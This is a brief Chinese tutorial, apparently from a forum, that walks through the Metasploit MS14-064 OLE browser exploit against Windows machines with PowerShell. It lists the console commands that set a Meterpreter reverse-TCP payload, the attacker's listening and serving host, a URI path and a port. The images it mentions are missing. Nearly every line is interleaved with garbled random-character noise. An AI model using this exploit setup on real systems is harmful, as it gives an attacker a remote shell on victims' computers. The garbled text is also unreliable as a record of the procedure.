' t$ l2 T# |! I# q5 Q) L 我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示9 J% r0 d* D+ r& y U& K o! N
C& a# ~ i) P6 B* D; @/ e# }+ v) m
开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图:
+ ]* O* O7 M2 i3 w, Y" ~ L6 ^
0 B! ~! {& N# E. W3 t6 ~ y6 d7 u8 O3 c3 o4 O
然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp
& ~6 N. f% Y8 {: t5 `( s- n
& _4 w1 {5 ]4 Z+ Z$ _
* J/ q' M5 c& R S) E2 ^/ E set AllowPowershellPrompt true
3 y% S, U; Z' O- w& ^
8 E2 Q( n6 S3 O
4 f3 ^' P T5 N8 s+ b9 @
Set LHOST 192.168.0.109
. k4 M/ C- F8 ]! v7 E! W7 {
0 ]+ V7 _/ G+ j9 h5 E5 P; K4 W, s
/ S5 D) w! F* R: z/ c: k
set SRVHOST 192.168.0.109! l: |2 ? t& W( m/ P0 D4 b" H
0 }! Y; a% w5 e3 O3 O1 |
# b- F& g" F3 ^: N
Set uripath share
- ^+ w0 G( r( W' D; O
! X) Z/ A2 I' s4 A* T
8 v8 [( Z( I6 h! \" O Set srvport 80. i* j/ x8 y( Y& G& J) `. }. d3 E" V
8 O/ {# `% \* ?6 ~7 C, I/ L$ {) A" t, A _: C* E
' r% k: H4 m. N! b% n
3 \. c8 u' r# f9 |
+ Z5 t' o0 U! E1 A# y * Y1 t9 w4 M2 Q! N
( P* x' N7 C' g9 c* s& g. M( _4 E
0 p- M Q$ d7 v* X: t# ~ $ Z W' N7 g# d* _) p/ B' w
9 c6 s4 N; h" w5 ] a; G0 L( E, m0 s% f f
# O* q. S2 h1 g+ {: i! C' J7 G
# j+ A5 F5 h5 y* M7 A0 c% d
% m" s; d; G! y# x1 \+ M
8 W3 u: f0 z* [! m0 U
9 Z" Q$ K3 H# N
+ L! N6 j! t3 L/ j8 c# J 下面我们来访问本地地址如图:4 Y, ^2 S& w3 T6 J r
, v& i- Y! D& Z+ V
3 t- p4 R/ {6 p$ o" q + P7 {. u3 x1 |3 ]7 i
& D% P( ]. R' b# z& X1 H0 Z" g# m5 {$ a) \/ D! a u% T( [
8 f3 V9 a' T, s2 w; K
. k u# _# z( N& A4 B5 A+ _
! o$ K! W8 C- {
0 E/ \4 i( d0 @, E& }7 d2 @- s